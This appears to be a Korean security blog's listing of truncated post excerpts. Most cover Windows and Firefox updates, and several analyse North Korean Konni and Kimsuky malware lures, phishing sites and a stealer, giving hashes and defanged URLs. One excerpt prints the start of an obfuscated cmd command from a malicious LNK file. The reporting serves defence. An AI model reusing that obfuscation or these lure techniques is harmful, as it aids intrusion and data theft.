마이크로소프트는 2024년 7월 Windows 보안 업데이트를 설치하고 일부 윈도우 장치가 BitLocker 복구로 부팅될 것이라고 경고BitLocker Windows 보안 기능은 저장소 드라이브를 암호화하여 분실, 도난 또는 부적절하게 폐기된 장치로 말미암은 데이터 도난 또는 정보 노출 위험을 완화Windows 컴퓨터는 하드웨어 및 펌웨어 업그레이드,TPM(신뢰할 수 있는 플랫폼 모듈) 변경 등 다양한 이벤트가 발생하고 자동으로 BitLocker 복구 모드로 전환되어 기본 잠금 해제 메커니즘을 통해 잠금 해제되지 않은 BitLocker 보호 드라이브에 대한 액세스를 복원할 수 있음마이크로소프트는 Windows 릴리스 상태 대시보드에서 2024년 7월 9일에 출시된 2024년 7월 Windows 보안 갱..
오늘은 북한 해킹 단체 Konni(코니) 암호화폐 거래소 빗썸(Bithumb) 정보 업데이트 요청으로 위장한 악성코드- 금융당국 요청에 따른 프로젝트 정보 확인 요청의 건.zip (2024.7.23)에 분석을 진행을 해보겠습니다.코니 는 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 그룹은 북한에 본부를 두는 것으로 추정되며 한국과 미국의 정부 기관 및 조직을 표적으로 삼는 것으로 알려졌으며 북한 해커 그룹은 피싱 메시지나 이메일을 통해 Konni RAT를 배포하며 공격자는 Konni RAT를 사용하여 피해자로부..
오늘은 카카오 광고 차단하기 위한 호스트 파일 조작 시 위험성에 대해 글을 적어 보겠습니다. 호스트 파일이라는 것은 운영 체제에서 인간 친화적인 호스트 이름을 IP 네트워크에서 호스트를 식별하고 찾는 IP(숫자 인터넷 프로토콜) 주소에 매핑하는 데 사용이 되며 호스트 파일은 컴퓨터 네트워크의 네트워크 노드를 처리하는 여러 시스템 리소스 중 하나이며 운영 체제 IP 구현의 일반적인 부분호스트 파일에는 첫 번째 텍스트 필드의 IP 주소와 하나 이상의 호스트 이름으로 구성된 텍스트 줄이 포함되어 있습니다.컴퓨터에서 도메인 이름을 IP 주소로 변환하는 데 사용되는 작은 텍스트 파일이며 쉽게 말해면 웹사이트 주소를 입력했을 때 어느 컴퓨터로 연결해야 하는지 알려주는 역할을 하게 되는 부분입니다. 최근 유튜브 나 ..
구글에서 제공하는 주소 단축 주소 서비스인 goo(.)gl 2025년 8월 25일에 종료하기로 했습니다. 2010년에 URL Shortener를 출시했습니다. Google 툴바 및 Feed burner에서 처음 사용되었으며 나중에 공개적으로 사용할 수 있게 되었습니다.게시물에 따르면 goo(.)gl 링크는 2025년 8월 25일에 작동이 중단됩니다. 다음 달부터 사용자에게는 서비스 종료를 알리는 전면 페이지가 표시 페이지에는 이 링크는 가까운 시일 내에 더는 작동하지 않습니다 라고 표시됩니다. 사용자는 링크 대상으로 계속 이동하고 다시 표시하지 않음을 선택하여 2025년 8월 25일까지 경고 페이지를 건너뛸 수 있는 옵션이 제공합니다.Google은 전면 광고 페이지가 다음을 포함한 특정 작업 흐름을 중단..
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 피싱(Phishing) 사이트로 고려대학교 지식기반 포털시스템으로 속이는 사이트입니다. 일단 진짜 고려대학교 지식기반 포털시스템 접속을 해보니 진짜 사이트는 접속이 안 되고 인터넷 검색을 돌려 보니 예전에 운영하던 진짜 사이트하고 똑같이 제작이 된 것을 확인할 수가 있었습니다.유포 사이트hxxp://osihi(.)store/korea/Intro(.)kpd(.)html이며 일단 다른 것은 예를 들어서 메일, 연구 포털, 도서관, 여러 가지 증명, 수강신청 등과 같은 것은 진짜 고려대학교 사이트로 넘어가게 작성이 돼 있습니다.그리고 웹 소스를 보면 http로 된 진짜 사이트들이 있는데 그러면 연식이 오래된 피싱 사이트 라는 것을 추측할 수가 있습니다.H..
오늘은 Python(파이썬)으로 만들어진 스틸러(Stealer)인 ud123.bat에 대해 글을 적어 보겠습니다.파이썬은 1991년에 귀도 반 로섬(Guido van Rossum)에 의해 만들어진 인터프리터 프로그래밍 언어이며 현재는 교육용 프로그래밍 언어로 각광 받고 있습니다.일단 해당 악성코드는 스틸러(Stealer) 즉 뺏는 것입니다. 브라우저 접근기록부터 신용카드, 암호화폐 지갑 정보 등의 개인정보 및 신용정보 등을 탈취 정보 유출형 악성코드입니다. 뭐 HEX로 보면 이상한 글자들만 반복만 될 것인데 쭉 내려가면 다음과 같은 결과를 얻을 수가 있습니다.CyberChef 로 보면 다음과 같은 결과를 확인할 수가 있습니다.MD5:f796cce1fb77fe1a71c8b248ced9fac4C:\WINDO..
Microsoft(마이크로소프트)는 윈도우 업데이트에 대한 근본적인 변화를 발표기본 제공 서비스는 전 세계 수백만 대의 윈도우 장치에 대한 업데이트를 제공할 것입니다.올해 기능 갱신 출시부터 대부분의 Windows 업데이트는 상당히 작아질 것입니다.Windows 11의 누적 업데이트에는 운영 체제의 마지막 RTM 릴리스 이후의 모든 변경 사항이 포함되며 이는 장치에 이미 설치되었을 수 있는 수정 사항 및 변경 사항이 포함되어 있음을 의미계획된 변경 사항은 Windows 11 버전 24H2 및 Windows Server 2025에 적용될 것입니다.앞으로 클라이언트와 서버 Windows 배포에서도 새로운 기능을 활용할 것입니다.Windows 11 체크포인트 누적 업데이트윈도우 11용 체크포인트 누적 업데이트..
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 강연의뢰서_근로신청서 관련의 건. docx.lnk(2024.7.9)에 대해 글을 적어 보겠습니다.2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 근로신청서 관련의 건으로 위장하는 악성코드이며 그냥 보면 워드 파일인 것처럼 보이지만 아이콘을 잘 보면 링크 파일인 것을 확인할 수가 있습니다.해쉬값파일명: 근로신청서 관련의 건.docx.lnk사이즈:17.1 KBMD5:21d12dc7f08752293847af6ed19df0e3SHA-1:5..
오늘은 2024년 1월 보안 업데이트 에서 윈도우 복구 영역이 없으면 윈도우 에서 에러가 발생하고 업데이트가 되지 않는 문제가 있습니다. 물론 다른 보안 갱신은 되는 (KB5034440,KB5034441 문제는 윈도우 복구 영역(WinRE 이미지)문제가 발생합니다.이를 해결하려면 다음과 같은 준비물이 필요합니다. 먼저 윈도우 10,윈도우 11 순정 ISO가 필요합니다. (보안 을 위해서 개인적으로 수정된 버전보다 순정을 좋아합니다.)그리고 나서 윈도우 ISO에서 \sources 폴더로 이동해서 install(.)wim 이라는 파일만 하드디스크에 복사합니다. 그리고 자신이 사용하는 압축 프로그램으로 install(.)wim 압축을 강제로 풀어 줍니다. 물론 압축 프로그램으로 강제로 열어주어도 됩니다.1~5..
2024년 1월 윈도우 정기 보안 업데이트 에서 복구파티션이 없을경우 0x80070643 에러를 발생을 하는 문제가 발생을 했습니다.해당 보안 업데이트인 KB5034440 및 KB5034441 은 해커가 BitLocker 암호화를 우회하기 위해 악용할 수 있는 WinRE(Windows 복구 환경)의 보안 취약점을 악용을 하는것을 차단을 하기 위한 보안 업데이트 입니다.여기서 문제는 안전한 OS 동적 업데이트가 추가된 KB5034236에서 수정되었찌만 KB5034440,KB5034441 업데이트에는 버그가 있어 설치에 실패여러 사용자가 수동으로 설치를 시도했지만 실패했습니다. 항상 오류 설치 실패라는 0x80070643 오류가 발생하고 있습니다.여기서 마이크로소프트는 오랫동안 해결되지 않았던 문제를 5월 ..
오늘은 백신프로그램 탐지 회피(기타 보안 제품) 하려고 워드 파일을 PDF 포함하는 MalDoc in PDF에 대해 글을 적어 보겠습니다.MalDoc in PDF로 작성된 파일은 PDF의 매직 넘버나 파일 구조로 되어 있음에도 Word에서 열 수 있는 파일이 되게 돼 있습니다.파일을 Word에서 열면 파일에 Macro(매크로)가 설정되어 있으면 VBS가 작동하고 악성 동작을 수행을 진행합니다.이번에 사용할 악성코드 해쉬값은 다음과 같습니다.파일명:0723Request.doc.zip사이즈:24.8 KBMD5:3c90b82156211c30cb2db8c7d569f3adSHA-1:7dc6ea6c156186b57d422038a37d633d3a605379SHA-256:75385dfea84ed375f6f5d0cfe9..
모질라 에서 제공하는 브라우저인 파이어폭스 브라우저에 대한 파이어폭스 128(Firefox 128) 보안 업데이트가 진행이 되었습니다.이번 보안 업데이트 에서는 새로운 기능과 그리고 브라우저 버전에는 새로운 번역 기능, 통합된 사용자 데이터 삭제 대화 상자 등을 포함하여 다양한 새로운 기능과 개선 사항이 도입되었습니다. 안드로이드 버전 에서는 Firefox는 버전 128, Firefox Beta 및 Dev는 버전 129, Firefox Nightly는 버전 130으로 각각 변경이 됩니다.파이어폭스 128.0 변경 사항번역 개선Firefox 번역은 이제 텍스트 및 하이퍼링크 텍스트 선택을 번역할 수 있음실행 방법Firefox에서 텍스트를 선택하세요.선택 항목을 마우스 오른쪽 버튼으로 클릭하세요.상황에 맞는..
마이크로소프트에서 제공하는 운영체제인 윈도우에 대한 각각 KB5040427, KB5040442 보안 업데이트가 진행이 되었습니다.Windows 10 KB5040427의 새로운 기능해당 업데이트에는 총 13개의 수정 사항 또는 변경 사항이 포함되어 있음윈도우 설치 프로그램, 응용 프로그램을 복구할 때 UAC(사용자 계정 컨트롤)는 자격 증명을 묻는 메시지를 표시하지 않으며 해당 업데이트를 설치하면 UAC에서 해당 업데이트를 묻는 메시지를 표시합니다. 이로 말미암아 자동화 스크립트를 업데이트해야 할 수도 있습니다. 방패 아이콘을 추가하면 됩니다. 이는 프로세스에 전체 관리자 액세스가 필요함을 나타냅니다.UAC 프롬프트를 끄려면 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsof..
OpenAI의 Mac 용 ChatGPT(쳇GPT) 앱이 채팅 내용을 일반 텍스트로 저장하고 있음을 발견 인기 있는 챗봇의 데스크톱 앱이 사용자가 챗봇과 나눈 대화를 일반 텍스트 형식으로 로컬 저장소에 저장하고 있음을 밝히려고 Threads에 자신의 연구 결과를 Pedro José Pereira Vieito는 게시Mac용 ChatGPT는 대화를 일반 텍스트로 저장보안에 매우 관심이 있는 Pedro José Pereira Vieito는 6년 전 출시된 macOS Mojave 10.4 이후 macOS가 다른 앱이 사용자 데이터를 스누핑하는 것을 차단해 왔다고 지적을 했습니다.Vieito는 문제의 앱이 샌드박스 처리된 경우 macOS가 다른 앱이 채팅에 액세스하도록 허용해서는 안 된다고 했으며 보다 구체적으로 ..
마이크로소프트는 윈도우 에서 TLS(전송 계층 보안) 프로토콜 버전 1.0 및 1.1을 비활성화할 계획마이크로소프트는 2023년 8월 1일 기술 커뮤니티 웹사이트에 해당 내용을 발표문제가 되는 두 프로토콜은 1999년(TLS 1.0)과 2006년(TLS 1.1)로 거슬러 올라가며 이후 새 버전인 TLS 1.2와 TLS 1.3으로 대체되었습니다.마이크로소프트는 이전 프로토콜 버전에서 보안 문제가 발견되었으며 인터넷 표준 및 규제 기관은 그에 대한 대응으로 TLS 버전 1.0 및 1.1을 더는 사용하지 않거나 허용하지 않음TLS 1.0 및 1.1의 사용이 수년에 걸쳐 많이 감소했으며 이는 Microsoft는 두 프로토콜을 비활성화할 때가 왔다고 생각을 하는 것 같습니다.또한, Microsoft는 프로토콜을 ..
Twilio 에서 제공하는 Authy의 2단계 인증(2FA) 서비스가 전화번호를 확인하기 위해 API를 악용되었습니다.Twilio는 보안 되지 않은 API 엔드포인트 를 통해 위협 행위자가 수백만 명의 Authy 다단계 인증 사용자의 전화번호를 확인할 수 있게 하여 이들이 잠재적으로 SMS 피싱 및 SIM 스와핑(유심 스와핑) 공격에 취약해질 수 있습니다.Authy는 MFA가 활성화된 웹 사이트에서 다단계 인증 코드를 생성하는 모바일 앱ShinyHunters라는 위협 행위자는 Authy 서비스에 등록된 3,300만 개의 전화번호가 포함된 CSV 텍스트 파일을 유출했습니다.Authy 고객은 자신의 전화번호가 유출 내용에 포함되어 있으면 조회할 수 없습니다. 위협 행위자는 전화번호만으로는 아무것도 할 수 없..
Windows 11에 광고가 쏟아지고 있습니다. 이제 운영 체제의 Microsoft 날씨 앱에 더 많은 광고가 표시됩니다.1년 전 마이크로소프트가 실제로 앱 에서 광고를 제거했고 마침내 사용자들의 피드백을 들은 것으로 나타났습니다.하지만, 귀찮은 배너가 다시 나타나서 이제 예측 페이지에 그 중 두 개가 표시됩니다. 모르시는 분들을 위해 말씀드리자면 이전 버전의 Microsoft Weather는 UWP 앱이었지만 회사에서는 이를 Edge 엔진을 사용하는 컨테이너인 Edge WebView로 교체했습니다. 즉, 날씨 앱은 기술적으로 msn(.)com/weather 의 웹 래퍼일 뿐입니다. 이를 직접 테스트할 수 있습니다. 브라우저에서 웹사이트를 열고 일시적으로 광고 차단기를 비활성화하여 광고를 살펴보세요. 이..
오늘도 우리 북한의 해킹 그룹인 Konni(코니) 에서 우리 국세청으로 속여서 만든 악성코드인 부가가치세 수정신고 안내(부가가치세사무처리규정).hwp(2024..6.27).lnk에 대해서 알아보겠습니다.2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 그룹은 북한에 본부를 두는 것으로 추정되며 한국과 미국의 정부 기관 및 조직을 표적으로 삼는 것으로 알려졌으며 북한 해커 그룹은 피싱 메시지나 이메일을 통해 Konni RAT를 배포하며 공격자는 Konni RAT를 사용하여 피해자로부터 정보를 수집하고, 스크린 샷을 캡..
오늘은 가짜 윈도우 보안 경고로 사람을 낚아서 금전적 이득을 취하는 피싱 사이트 criticalfuckdedicated(.)s3(.)ap-southeast-1(.)amazonaws(.)com(2024.6.3)에 대해 글을 적어 보겠습니다.피싱 보다는 일단 해당 스캠(Scam) 이라고 생각을 하면 쉽게 사용자를 속이는 신용 사기로 보는 쪽이 나을 것 같습니다. 사기 치는 방식은 간단합니다.사이트에 보면 전화번호가 있으며 해당 번호로 전화를 걸면 이제 해당 언어에 맞게 담당자가 나와서 여기 마이크로소프트 공식 기술 지원팀입니다. 라고 답변을 할 것이고 제가 화면에 이렇게 저렇게 나오고 에러 코드 2V7HGTVB 이 나와야 하면 OK 한 놈 낚았다. 라면서 작업을 할 것입니다.장치에 대한 원격 액세스 를 제공..
컴퓨터 게임은 해가 갈수록 점점 더 용량이 커지고 있습니다.전체 게임을 작은 플로피 디스크에 쉽게 담을 수 있는 시대는 사실상 없었졌으며 요즘에는 많은 게임을 다운로드해야 하며 게임 다운로드 용량이 10GB 를 초과하는 경우가 많습니다.일부 게임은 하드 드라이브 용량이 100GB를 쉽게 넘지만 압축 기술 덕분에 다운로드 용량이 더 작아지는 경향이 있습니다.게임 다운로드 크기가 증가하면 여러 가지 문제가 발생할 수 있습니다.게임을 다운로드하는 데 시간이 더 걸림특히 인터넷 연결이 느리거나 불안정한 경우 사용하는 서비스나 서버가 느린 경우에는 더욱 그렇습니다.업데이트를 더 빨리 다운로드할 수 있습니다.게임을 플레이하는 데 시간이 더 오래 걸리며 게임을 구매하고 즉시 플레이하는 것은 더 이상 과거의 일입니다...
오늘은 우리 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 강연의뢰서_엄구호 교수님.docx.lnk(2024.6.4)에 대해 글을 적어 보겠습니다.2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 한양대학교 서울캠퍼스 국제학부 교수이신 분을 대상으로 한 것 같고 제목 보니까 강연의뢰서라고 돼 있는 것이 워드 파일인 것처럼 해서 해당 교수님에게 강연 의뢰서인 것처럼 해서 해킹을 시도하는 것 같습니다.악성코드 해쉬값파일명:강연의뢰서_엄구호 교수님.docx.lnk.lnk사이즈:1.01 MBM..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스에 대한 유튜브(YouTube)재생 문제를 수정한 Firefox 127.0.2(파이어폭스)로 업데이트가 되었습니다.지난 5개월 정도 동안 일부 Firefox 사용자는 YouTube에서 정기적으로 문제가 발생했습니다.Mozilla(모질라)가 문제를 분석하고 해결책을 찾는 데 시간이 좀 걸렸으며 그 핵심 이유는 엔지니어들이 YouTube(유튜브)에서 같은 비디오에 액세스 하더라도 처음에는 이를 문제를 재현할 수가 없었습니다.그리고 얼마후 Mozilla 엔지니어인 Alastor Wu가 문제의 근본 원인을 발견그는 이 문제가 YouTube(유튜브)에서 제공하는 잘못된 다중화 VP9 바이트스트림으로 인해 발생Mozilla(모질라)에 따르면 이 문제는 Google이 ..
모질라 에서 제공하는 브라우저인 Firefox(파이어폭스)에서 세로 탭을 사용하는 방법에 대해 알아보겠습니다.해당 기능은 아직 정식 버전에서 사용할 수가 없으면 Firefox Nightly(파이어폭스 나이틀리) 버전에서 추가를 해서 사용을 할 수가 있습니다.파이어폭스 세로 탭Firefox는 이미 왼쪽 또는 오른쪽 표시를 지원 탭은 기본적으로 아이콘과 함께 만 표시되지만 사이드바를 확장하여 웹 사이트 제목의 처음 몇 글자도 표시할 수 있습니다.현재 이러한 탭에는 계층 구조가 없으며 즉, 모두 동일한 수준에 표시됩니다.먼저 Firefox Nightly 버전 최신 버전을 설치합니다.about:config 로드sidebar.revamp:Truesidebar.verticalTabs:true그리고 나서 파이어폭스 ..
러시아의 예브게니 카스페르스키(Евгений Касперский,유진 카스퍼스키)가 제작한 개인 백신 프로그램에서 시작해서 현재는 세계적인 백신 프로그램이 된 안티바이러스 프로그램이며 높은 진단율과 낮은 오진율이라고 할 수 있습니다. 개인적으로도 노턴 인터넷 시큐리티 사용하기 전까지 해당 Kaspersky(카스퍼스키)를 사용한 적이 있었습니다.2022년 러시아의 우크라이나 침공 이후 러시아에 대한 서방의 대대적인 제재가 불거진 상황에서 2022년 3월 15일 서방 국가 중 처음으로 독일 정부가 정부기관뿐만 아니라 일반 국민을 대상으로 카스퍼스키 제품 사용 중단 권고를 내렸으며 카스퍼스키는 러시아 해외정보국와 밀착된 기업이라는 의심을 오래전부터 받아오는 회사일 것이라는 소리가 있지만, 최신 코드까지 미 정..
오늘은 북한의 해킹 그룹인 Konni(코니)로 추정이 되는 2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk에 대해 글을 적어 보겠습니다. 일단 해당 악성코드의 해쉬값은 다음과 같습니다.파일명:2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk사이즈:33.0 MBMD5:cfffb45df8f05d1cb5d9d95fd5a83e9eSHA-1:4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944SHA-256:00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37일단 해당 파워셀에 포함된 코드는 다음과 같습니다./c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%(%)..
마이크로소프트는 Windows 10 앱 에서 이 파일을 어떻게 열겠습니까? 라는 오류 메시지가 잘못 표시된다는 사실을 확인했습니다. 해당 프로그램 아이콘을 마우스 오른쪽 버튼으로 클릭하고 등록된 작업을 수행하려고 하면 대화 상자가 나타납니다.시작 메뉴나 작업 표시줄에서 프로그램 아이콘을 마우스 오른쪽 버튼으로 클릭하면 실행할 다양한 작업을 제공하도록 Windows 앱을 등록할 수 있습니다.예를 들어서 새로운 Windows용 Outlook 앱 아이콘을 마우스 오른쪽 버튼으로 클릭하면 새 메시지, 새 이벤트 및 일정 열기라는 레이블이 붙은 작업이 표시마이크로소프트는 4월 KB5036979 미리 보기 업데이트 이후 이러한 작업 중 하나를 사용하려고 하면 연결 프로그램 대화 상자가 표시된다는 내용을 윈도우 메시..
구글에서 제공하는 브라우저인 구글 크롬에서 사용자의 검색 기록을 인공 지능으로 제어할 수 있는 Google Chrome의 새로운 기능을 개발 중입니다. 구글 크롬 사용자는 검색 기록에서 검색을 실행할 때 AI와 상호작용할 수 있습니다.주요 내용은 다음과 같습니다.구글 크롬 사용자는 곧 자연어를 사용하여 검색 기록을 검색할 수 있음브라우저는 방문한 페이지의 콘텐츠를 암호화된 형식으로 로컬에 저장해당 기능은 검색 데이터를 Google에 제출Google은 검색에는 페이지 제목 및 URL뿐만 아니라 일반 페이지 콘텐츠도 포함되어 있다고 지적 해당 기능은 향상된 결과를 반환하며 Google에 따르면 주소 표시줄과 기록 페이지에서 작동구글에 따르면 AI를 사용하기 때문에 일상적인 검색 언어 사용을 지원한다고 한다...
오늘도 우리 북한의 해킹 그룹인 Konni(코니)에서 우리 국세청으로 속여서 만든 악성코드인 VAT.hwp(2024.6.13)에 대해 글을 적어 보겠습니다.2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 그룹은 북한에 본부를 두는 것으로 추정되며 한국과 미국의 정부 기관 및 조직을 표적으로 삼는 것으로 알려졌으며 북한 해커 그룹은 피싱 메시지나 이메일을 통해 Konni RAT를 배포하며 공격자는 Konni RAT를 사용하여 피해자로부터 정보를 수집하고, 스크린 샷을 캡처하고, 파일을 훔치고,원격 대화형 셸을 구축합니..
Bitwarden Authenticator는 다른 앱에서 시간 기반 일회성 비밀번호(TOTP) 토큰을 내보내고 가져오기 위한 지원을 추가를 진행했습니다.회사 Reddit 커뮤니티의 Bitwarden 직원이 공유혹시 놓친 경우를 대비해 Bitwarden Authenticator는 출시 약 한 달 전에 독립형 앱으로 되었으며 현재 이 앱을 사용하면 Bitwarden Password Manager,Google Authenticator,LastPass,2FAS,Aegis(Android용) 및 Raivo(iOS용)에서 2FA(2단계 인증) 보안 토큰을 가져올 수 있습니다.Raivo는 작년에 제3자에게 최근 보고서를 보면 앱 업데이트로 인해 사전 경고 없이 모든 TOTP가 삭제되었으므로 다른 인증 앱으로 전환하는 ..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스 브라우저 127.0 보안 업데이트가 진행이 되었습니다.파이어폭스 127.0 변경 사항보안 및 개인 정보 보호 개선Firefox 127.0에는 보안 및 개인 정보 보호 기능이 향상윈도우 및 macOS 사용자는 내장된 비밀번호 관리자에 액세스할 때 인증을 요청하도록 브라우저를 구성할 수 있습니다.새로운 옵션은 비밀번호 입력 및 관리를 위해 장치 로그인 요청입니다. 이는 브라우저의 개인정보 보호 아래 기본 설정에 있으며 about:preferences#privacy를 로드하여 해당 페이지로 바로 이동할 수 있습니다. 보호 기능을 추가하려면 기본적으로 비활성화되어 있는 옵션을 선택지문 정보를 줄여 Linux의 개인 정보 보호를 향상Firefox는 Firefox의..